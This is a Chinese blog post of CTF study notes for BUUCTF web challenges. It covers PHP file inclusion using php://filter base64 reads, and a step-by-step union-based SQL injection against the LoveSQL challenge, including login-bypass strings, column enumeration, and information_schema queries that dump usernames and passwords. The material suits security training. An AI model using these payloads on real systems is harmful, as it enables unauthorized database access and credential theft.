2021-01-17

最新推荐文章于 2023-06-27 12:08:05 发布
最新推荐文章于 2023-06-27 12:08:05 发布
阅读量158 收藏
点赞数
分类专栏: BUUCTF web sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/112757854
版权
web 同时被 3 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏
sql注入
5 篇文章 0 订阅
订阅专栏

知识点:

[ACTF2020 新生赛] IncludeWriteup:

  1. ?file=flag.php 猜测文件包含漏洞

  2. php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

  3. php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。

  4. php://input 伪协议 + POST发送PHP代码 (不行)

【BUUCTF】[极客大挑战 2019]LoveSQL

  1. 基础知识点:

    union 联合查询
    information 表
    group_concat()
    admin’ or 1=1 或者 1’ or 1=1 # 万能密码爆字段
    加单引号报错,存在SQL注入

  2. 注入流程:

    1.万能密码登陆
    2.登陆后,使用联合查询注入
    3.爆字段
    4.看回显
    5.爆数据库
    6.爆数据库的表
    7.爆出表的列
    8.爆出flag

  3. 爆字段:
    1’ order by 1 #
    1’ order by 2 #
    1’ order by 3 #
    1’ order by 1 %23
    1’ order by 2 %23
    1’ order by 3 %23

  4. 看回显:
    1’ union select 1,2,3 #

  5. 爆数据库:
    1’ union select 1,database(),version() #

  6. 爆数据库的表:
    只有一个数据库,省事直接相等:
    1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

    多个数据库,选择一个:
    1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘DATABASE’

  7. 爆出表的列:
    1’ union select 1,2,group_concat(id,username,password) from AAA%23&password=1

  8. 读取内容,爆flag:
    读aaa表
    1’ union select 1,2,group_concat(id,username,password) from aaa%23&password=1

无尽星河-深空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku CTF-Misc部分习题Write Up
soul_in_umbrella的博客
03-14 146
作者还是CTF菜鸟,为了学习写一写Write up,还望各位大佬指教。
2021-02-17
qq_54448122的博客
02-17 747
作业一:Python编程基础 按要求补全下列代码 1. 输入两个整数,并打印出它们的和 In [13] a = input('请输入第一个整数: ') b = input('请输入第二个整数: ') # 分别把 a、b 转换成整数 a = int(a) print('a =' , a) b = int(b) print('b = ' ,b) # 计算 a、b 的和,赋值给变量c c=a+b # 打印c print(c) 请输入第一个整数: 请输入第二个整数: a = 2 b = 3
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫(有需要的私信)
04-29 942
1、[极客大挑战 2019]EasySQL
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 8172
BUUCTF题目Misc部分wp(持续更新)
BUUCTF笔记之Crypto部分WriteUp(一)
克格莫(有需要的私信)
05-08 1373
1、RSA1 直接上代码: import gmpy2 as gp p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 12640674973996472769176047937170883420927050821480010581
BUUCTF Crypto [大帝的密码武器] writeup题解
qq_44611153的博客
06-27 283
然后对密文ComeChina用密钥13进行解密如果超出z就减去26让其回到A-z范围内即可得到答案。观察所有数据,发现单词security是有特殊含义的,这样就得到密钥为13。
2021-03-17
mimimi7777的博客
03-18 76
Definition and Usage The COALESCE() function returns the first non-null value in a list. Syntax COALESCE(val1, val2, …, val_n) Run the query entered below in the SQL workspace to notice the row with missing data. SELECT * FROM accounts a LEFT JOIN orders
C89-C17 C 语言标准参考手册 2021-01-22 最新版本
01-22
这份"2021-01-22 最新版本"的"C89-C17 C 语言标准参考手册"涵盖了从C89(即ISO/IEC 9899:1990)到C17(即ISO/IEC 9899:2018)的所有主要版本,是理解C语言演进和规范的权威资料。下面,我们将详细探讨这些版本中的...
MulanRevive#bounty#2021-01-17-重现木兰编程语言的基本 try……catch 语法1
07-25
木兰代码量 3307 -> 3349运行环境,实现与测试大部为木兰代码:582木兰测试用例,包括部分实用小程序(如井字棋):2725 -> 2767 (报错信息
tampermonkey-backup-chrome-2021-11-27T01-27-17-766Z.zip
11-27
配置过的油猴插件
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
WebIDE-UISimpleTC-2021-01-26T02-17-51.841Z-github:为工具链创建
03-07
【标题】"WebIDE-UISimpleTC-2021-01-26T02-17-51.841Z-github:为工具链创建" 暗示了这是一个与Web集成开发环境(Web IDE)相关的项目,可能是一个用于简化测试用例(UI Simple Test Cases)的工具,创建于2021年1月...
【buuctf-misc】--writeup
hello word的博客
01-06 2517
藏藏藏 binwalk查看隐藏文件: 有一个zip文件,分离:foremost 压缩包里有个福利.docx,扫描获得flag。 ezmisc 更改图片的高度即可。 把MRCTF换成flag提交。 你有没有好好看网课? 给了两个加密的zip,flag2.zip,flag3.zip flag2解密不出来,flag3可以跑出来。 flag3解密出来是一个docx和一个mp4。 flag3应该就是找到flag2的密码的关键。 然而,520711
BUUCTF WEB writeup(持续更新)
zjnu_y3s的博客
09-24 818
BUUCTF WEB(持续更新) 1、Warmup 打开题目链接,得到一张图片,如下图: 此时先想到看这个网页的源代码,输入source.php即可得到源代码,如下图: 进入php代码审计,粗略看一下可以发现有file,所以我们要想办法得到file,首先先看与file有关的代码块: 看到中间发现需要前面创建的函数,所以我们返回去进行前面代码的审计,在白名单处能看到有两个文件,一个source.php、一个hint.php,我们先打开hint.php,可以看到如下字符: 暂时不知道是干什么用的,
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5848
Web类题目
BUUCTF平台web writeup
a370793934的专栏
11-28 1549
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
BugkuCTF Crypto wirte up
酉酉的博客
07-18 1463
  1.滴答~滴 (1)思路:很简单,一眼看出是摩斯密码,直接用工具解码得到flag 解密工具:CTFCrakTools 2.聪明的小羊 (1)思路:提示当中看到栅栏就想起栅栏密码,2个栅栏解密,得到flag 解密地址:http://tool.bugku.com/jiemi/ 3.ok (1)思路:直接用Ook解密,得到flag 解密地址https://ww...
BUUCTF web-[HCTF 2018]WarmUp
m0_53314778的博客
01-14 4043
[HCTF 2018]WarmUp 点进去一个滑稽,,查看源码 有个php,访问php 查看源码,有个hint.php访问一下 提示说flag在ffffllllaaaagggg文件里,我们继续分析源码 我们发现最底部的if语句为执行条件,有三个条件,第一个判断文件不能为空(检查是否传了file参数),第二这个传的参数是字符串,第三要过白名单检测,过了之后包含 隐藏了flag的文件。我们再看上面的if语句,白名单是hint.php,又有mb_strpos和mb_substr截取内容,碰到?就截止,所以我们只
已知data = [ ('2021-01-01 08:00', 15), ('2021-01-01 12:00', 18), ('2021-01-01 16:00', 20), ('2021-01-02 08:00', 14), ('2021-01-02 12:00', 17), ('2021-01-02 16:00', 19) ]请写出代码对data实现指数平滑
最新发布
07-12
2021-01-02 12:00:00 17 16.562500 2021-01-02 16:00:00 19 17.781250 ``` 在上述代码中,我们使用`pd.DataFrame`将data转换为DataFrame,并将时间戳列设置为索引。然后,使用`ewm`函数对数据列进行指数平滑,其中`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值